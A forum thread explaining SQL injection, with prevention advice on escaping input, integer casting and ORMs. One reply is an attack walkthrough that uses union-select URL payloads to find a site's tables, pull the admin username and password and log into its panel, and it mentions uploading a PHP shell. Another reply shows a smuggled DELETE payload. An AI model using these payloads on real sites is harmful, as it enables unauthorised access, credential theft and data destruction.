SQL injection is used widely by infamous hackers around the globe (Lebanon included) to hack high profile corporations' websites.

Since i am an SQL noob, i wasn't able to understand what is SQL injection(in hacking terms) even after using Google. I know the basic syntax of SQL because it was used in my major course Data Management. So if someone could please define SQL injection and give an example not from real DBs or sites but just a statement with its SQL then apply the SQL injection trick.
Here's an example :

if it was MySQL you use /*
if it was MSSQL you use -- , and sometime you don't need to put them

example : w w w.website.com/index.php?id=1 you put [ ' ] or [ - ] before the 1 like : [ ?id=-1 ]
if an SQL error appears ( not a warning it should be an sql error ) so the website is vulnerable
you use the union select command and you keep getting up in numbers until the error is gone
example : w w w.website.com/index.php?id=-1/**/union/**/select/**/1,2,3/*
if the error is gone ==> we have 3 columns

Now you should know the name of ( users , admins .... ) tables
example :

w w w.website.com/index.php?id=-1/**/union/**/select/**/1,2,3/**/from/**/users/*
after entering the URL above you had an error ==> there isn't a table named "users"

So you keep trying until the error is gone
example : w w w.website.com/index.php?id=-1/**/union/**/select/**/1,2,3/**/from/**/members/*
Now the error is gone ==> there is a table named "members" !

now it should appears a number in the browser example "2"
so you enter this url in the browser :
w w w.website.com/index.php?id=-1/**/union/**/select/**/1,username,3/**/from/**/members/*

now per example the 2 in the browser should be replaced by "admin" ==> the user name is : admin

So now you should know the password we try this :
w w w.website.com/index.php?id=-1/**/union/**/select/**/1,password,3/**/from/**/members/*
So we got another error ==> the column that have the passwords isn't named "password"

we try another one "passwd" :
w w w.website.com/index.php?id=-1/**/union/**/select/**/1,passwd,3/**/from/**/members/*

So we got the password as 123456
No we Go to w w w.website.com/cms or w w w.website.com/panel or www.website.com/admin etc..

with the username : admin
and password : 123456

i haven't hacked through sql injection since years, i heard that there is scripts to find the cpanel url if not founded , and ways to upload a phpshell through SQL injection , try googling :)

Best Regards.
@ZeRaW: Sorry but i didnt want any sort of "help or how to" tutorial. Just explanation.
@shekvaL: Thanks a lot this is really informative.
Ah! So this is how you get the names of the fields.

I thought SQL injection was something like inserting into password texbox [ ' ' or 1=1 ]. So when this password is sent to the main server it will read something like

select * from x where username = 'whatever' and password = '' or 1=1

Seeing how 1=1 is always true, it will open. But then again, i have 0 knowledge on hacking haha.
It seems that this is not the real hardcore hacking, rather using an exploit in the SQL DB programming. The injection takes place in the URL.
It's pretty simple. Consider this PHP code: 
$username = $_POST['username'];
$q = "SELECT FROM `users` WHERE `username` = \"$username\" ";
$res = mysql_query($q);
$userRecord = mysql_fetch_object($res);
As you can see, a string received by POST is inserted in an SQL query directly. Normally this variable contains a string, the username, coming from some sort of form, for example login or registration form, or user search form...

Now the client can modify the post data he is sending, and it will still be inserted directly in the SQL query.
For example if he sends post variable 'username' as: 
"; DELETE FROM `users` WHERE 1 or `username` = "
This will result into the query string ($q) being, after variable replacement: 
SELECT FROM `users` WHERE `username` = ""; DELETE FROM `users` WHERE 1 or `username` = ""
That is effectively 2 queries that will be executed. As you can see, the attacker can do almost anything with the database if your variable are not protected.
Another SQL trick used in SQL injection attack is the comment delimiter: -- , what this will do is comment out the rest of the query.

In case you didn't figure out what the result of the attack will be in that example: deletion of all records in the "users" table.

The solution? Escape your variables. 
$username = mysql_real_escape_string($_POST['username']);
$q = "SELECT FROM `users` WHERE `username` = \"$username\" ";
As you can see the name of that function is annoyingly long! For integers (like numerical IDs), you can use a shorter method of casting to integer:
$id = (int) $_POST['id'] ;
$q = "SELECT FROM `users` WHERE `id` = $id ";
Anyway there is still a possibility for the developer to simply forget escaping his variables. Some people try to protect themselves by creating generic functions, which may look like that:
$res = mysql_safe_query("SELECT FROM `users` WHERE `username` = \"%1\"", $username)
Also, other more advanced means of accessing the database, such as ORM (Object Relational Mappers) and DAL (Database Abstraction Layers) usually take care of this issue.
rolf wroteAlso, other more advanced means of accessing the database, such as ORM (Object Relational Mappers) and DAL (Database Abstraction Layers) usually take care of this issue.
That's probably the best advice you could give to prevent SQL Injection :)

Nice explanation by the way!
Reminds me of the old days, I once got the schema of a whole website using sql injection and then the fun began. It was a website a lot of leb ppl used so yeah, fun!!
@rolf: thanks for the post. Really clear.

Two things:

1- I think "--" is vendor dependent. If I'm correct, it will only work with MySQL and MS SQL. I know for a fact that Sybase uses /* */ to delimit comments.

2- The examples you give for escaping are really php driven. The thing I hate about PHP, is that it will give you ready-to-work functions, so you miss the inner workings. I always encourage people to come up with their own escaping solutions (often by wrapping existing core functions).
@rolf: Thanks a lot for the prevention advice because i was going to ask about that. Your example was a bit detailed toward PHP code, which i dont know, so i hope this helped others.
rahmu wroteI always encourage people to come up with their own escaping solutions (often by wrapping existing core functions).
I kind of disagree with this. When doing a personal project, I would definitely roll my own escape functions because that's a good way to learn what can go wrong and how I should be thinking about input.

When writing production code, I always rely on well-tested functions provided to me by the library/framework that I'm using. Especially if it's open source, I know the code has been tested and used in real situations and that's reassuring.

It's a trade-off: I give up knowing how these functions work, for the peace of mind of not having my code compromised because I missed an edge case somewhere.